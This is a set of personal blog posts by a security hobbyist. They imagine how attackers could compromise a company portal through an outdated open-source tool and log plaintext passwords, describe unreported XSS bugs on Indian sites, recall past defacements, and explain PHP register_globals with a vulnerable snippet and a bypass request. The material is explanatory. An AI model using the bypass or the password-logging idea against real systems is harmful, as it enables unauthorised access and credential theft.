K World

This post is going to be technical. Some truth, some imagination and a bunch of assumptions.

My first assumption is - There is a big company with a portal which is primary means of doing many things across the company. Every employer gets access to the portal which they would use for their daily use.

My second assumption is - The company turns new-technology oriented, and it starts it’s own wiki or micro-blogging or even blogging with in the enterprise.

My third assumption is - The company considers an open source solution for the tool and modifies it a lot so that, by the time it opens it to the regular employees, the open source solution which they used gets an upgrade with the patches for the existing vulnerabilities in their solution.

My fourth assumption is - The company, as it managed to modify the code for making it work seamlessly with their current environment wouldn’t take more pain to upgrade the version of opensource solution which they are using.

Out of these four assumptions, we get a situation with the weakest link - A situation where a modified-but-vulnerable opensource solution is integrated with a company’s portal.

My brain’s assuming part will stop working here and the imagination part starts here. When a new tool is integrated seamlessly to the tool, it would be using LDAP for authentication. It’s a solution that can be easily guessed as well as confirm. When LDAP is being used, the next interesting imagination would be - they will be using a flow - where, if any user tries to login - if the user is first time user, the open source solution will create a profile for him in the solution’s database, or if not, just let him in based on the LDAP authentication.

The above all will work great as long as They are not concentrating on you. But, when They concentrate on you, greatest codes will look vulnerable simple codes. As per the title, I’m going to write “How Would They Do ?” Again, it’s completely imagination as I’m not “good enough in skill” or “bad enough in motive” to be one of Them. Let’s see what would They do.

They will find that the latest added opensource solution is the weakest part of the portal and try to find out the version of the solution. Using the solution, they would find the list of vulnerabilities and try to exploit them. If they succeed at this point, they will try to get complete access over that opensource solution a.k.a new tool. They will make themselves admin on the new tool, and look for possible chances of going further. Some of the current opensource solutions are so-advanced that they allow to edit code of their plugins/themes/core through their interface if the user is administrator. If not that advanced, atleast they allow the administrator to take a backup of the complete database. Both the cases are bad, first being terrible and second being bad enough to hurt.

But, if the case is first, where They got admin rights and They can edit the code, They would simply edit the code to do their work and that is - The solution would add every user and his password to new table on their successful authentication and later they can download the database of users with their un-hashed passwords which is the biggest thing that can go wrong for that total portal. The total compromise.

This is some stupid theory with lots of facts, assumptions and imagination in it. If you understand technology, you can understand the seriousness of simple mistakes we do. If you don’t understand technology, I didn’t expect you to be so bored that you read this post !! And by the way, if you haven’t understand who are They … come on dude, it’s dream of every kid who use computer to become like Them and read their friends’ emails. No more hints.

Well, when you hate something, you’ve to accept that it got your attention in a way or other. So, you tend to think about it. I’m no excuse. Just coz, I hate rediff, I started looking for XSS (Cross Site Scripting) bugs. Well, there are a total of listed in XSSed and I found a good number to prove that rediff is a very-bad coded portal. One can view this page to see the bugs and see the elite-ness of rediff.

The important services of that are vulnerable, which are offered by rediff include its homepages and shopping. If you remember those dark old days of orkut when those so-called hackers took over communities they hate, it was done by exploiting the XSS vulnerability in orkut, that time. Now, you can understand, whoever have their homepages on rediff, or/and people who do shopping @ rediff are not using a secure service.

PS: Having XSS in a site doesn’t make it a worst site as even MS, Google, Yahoo had/have them. Even the MNC which I work for, had a similar bug in their portal, but, it was fixed as soon as they were notified through a specific channel. But, I don’t know why portals like rediff and mouthshut employ stubborn webmasters who hate to accept that their code has bugs. They must have either ignored or never read my mails.

The following is a technology related stuff and The Darker Side of Me and a very very very long “essay” about me. Be warned.

Gone are the days when I didn’t know how to shut down a windows PC. When I use to call those so-called “engineers” to fix my PC and shell out an extra buck to get some games installed on my box. I remember the day when my cousins made fun of me for switching off that PC as if the OS was DOS. Good old days and nights of “Age of Empire”. Hours and Hours of “Road Rash” and “Need for Speed”. One fine day, which almost changed my life in a smaller sense, a friend of my dad forgot the password for a word Document he kept and asked me whether I can do anything to find it.

It was the day, I saw the darker side of the Computing World, the security world. I searched in Google (that time, its a cool new search engine introduced by my cousin. Thank You Ark) to find out how password of a word document can be cracked. I managed to find one software which can crack it, but it was shareware. Then, I saw that it was software one has to buy, but my cousin Ark told me that there is a software named “Serials2K” which will have serial number for any software. I was pretty much impressed by the software, but, being little different, I wanted to know how the guys find those keys. My question was answered by a process named “Reverse Engineering“. But, it wasn’t enough for me, I wanted to learn how to do it. Then, I found a forum where some folks claimed to know that art and are teaching guys there. That forum had over 4000 members with weird names a.k.a handles. I became one of them and started learning about computers. But, my skills weren’t improving in the skill I wanted to learn (Reverse Engineering) but at Social Engineering. I became one of the moderators of the board, then one of the administrators of the board, then administered their IRC server. When having admin access to  the board, I learned PHP, Perl and Python. As part of my curriculum, I learned C, C++, Java, VB. Then, being at a board, I saw the culture of “clans” in the board, where another board members use to come to our board and spam/flame/do_crap at our board. Our answer was a simple deface of their site, which introduced me to the lowest level of computer security skills. Then, my interests changed to VIRUSes and then I collected source codes of 1000 viruses, through which I wanted to learn coding viruses but never earned those skills or simply never tried to be malicious.

Then, the greatest turn of my life came, when I was introduced to a site named “try2hack” which dealt with so-called “hacking” simulations. This is the start of the brighter side of my internet life. I left all those kiddie and illegal things along with those boards, closed my clans, ditched those emails, forgot those net-friends a.k.a clan mates (except one) and then I solved all of them within couple of weeks and then started looking for similar sites, then I finally found the site which helped me to learn so many things - Net Force.

Net-Force is the site which doesn’t support any illegal a.k.a hacking activities but it gives a very good simulation at the real stuff. There are 8 categories (Javascript, Java Applets, Cryptography, Exploits, Cracking, Programming, Internet and Steganography) with a total of 93 challenges. Challenges of various levels from basic tutorials to very hard challenges. I managed to solve 82 of them up to now. I learned something from each and every challenge and I’m glad that I learned them. The domain of challenges is so wide that you will learn atleast a little about a wide variety of topics.

I’m what I’m right now with little knowledge about a wide variety of topics - Jack of all trades. I never mastered anything up to now. But, I want to be a master in one. I’ve chosen two topics in which I want to be more than a Jack. One of them being XSS and another is SQL Injections. I started learning about XSS already. My progress is at XSSed. It is an archive of XSS vulnerabilities in various web applications as well as sites ordered by PageRank. I wish, one day, I will be a master at something.

Uhmmm, will you guys understand if start writing about XSS ??? If you understand, good, if you don’t, great, as it tells that you’ve so many other things in your life to worry about than mere security on a web site. But, in order to understand what I’m writing here, you’ve to know little about XSS - Cross Site Scripting.

XSS, in simple terms is a computer security vulnerability found in web applications which allow code injection by bad guys. The bugs can be exploited to craft powerful phishing attacks including stealing credentials.

Why am I writing about this ? Yesterday, I found couple of XSSes in two big Indian web sites. Rediff and MouthShut. I’ve reported to MouthShut about the vulnerability, but not rediff (Sorry rediff, I hate you) The below screenshot is XSS in MouthShut. If they’ve fixed, you can see it here.

As I hate rediff, and I didn’t report to rediff, I don’t want to post about rediff’s XSS. But, You can see that rediff is STUPID by giving some weird chars (hint : Vulgar fraction for ½ brained rediff) as input in its search box.

So, how do you escape from such kind of attacks ??? See my last post. Fire-up your fox with NoScript. It saves you from bad guys of this world.

I deal with little PHP at my work. Some of my teamies also deal with php. One of my teamies who left for some other company, created a great application which is a shopping cart with certain _damn_cool_ features. He used php do some stuff.

Someone else wanted to see that tool again, and another teamie tried installing it on a laptop. He was reading Installation Manual for the application, where I saw one point as .. “Set register_globals to ON”

As a security enthusiast, I always read about “how not to do” a lot. I still remember that most controversial change in php of setting default value for register_globals was changed to ON from OFF. When I came back to the scene, I can smell one thing. One possible security breach. Registering Globals can really go fatal for the application sometimes when the logic is bad.

Consider the following code snippet

<?php
if (authenticated_user()) {
$authorized = true;
}
if ($authorized) {
    include “/highly/sensitive/data.php”;
}
?>

In the above snippet (from php.net) if you can see that if the user is authenticated, a variable $authorized is defined with value “true”. If value of variable $authorized is true, highly sensitive data is included.

The logic doesn’t look flawed from the exoskeleton of the code. But, it is very bad logic to code such kind of application … especially when register_globals are on.

When register_global are set to on, one can create a variable through a request. Now, if we call the above code as

access.php?authorized=1

What’s going to happen now ? If I’m authenticated_user(), fine. I’ve every right to access the data. If I’m not, $authorized is created with value 1 as we are creating it using our GET request and this gives me access to the sensitive data which I’m not allowed to access. Here, this can be avoided by creating $authorized with value false on top of the code.

You can know more about this security issue at php.net If you are using php << 4.2.0, Don’t forget to change the directive register_globals to OFF or take proper care to secure your code. If you are using php >> 4.2.0, you need not worry much about this as the default value is OFF. This directive is going to be removed from php 6 onwards.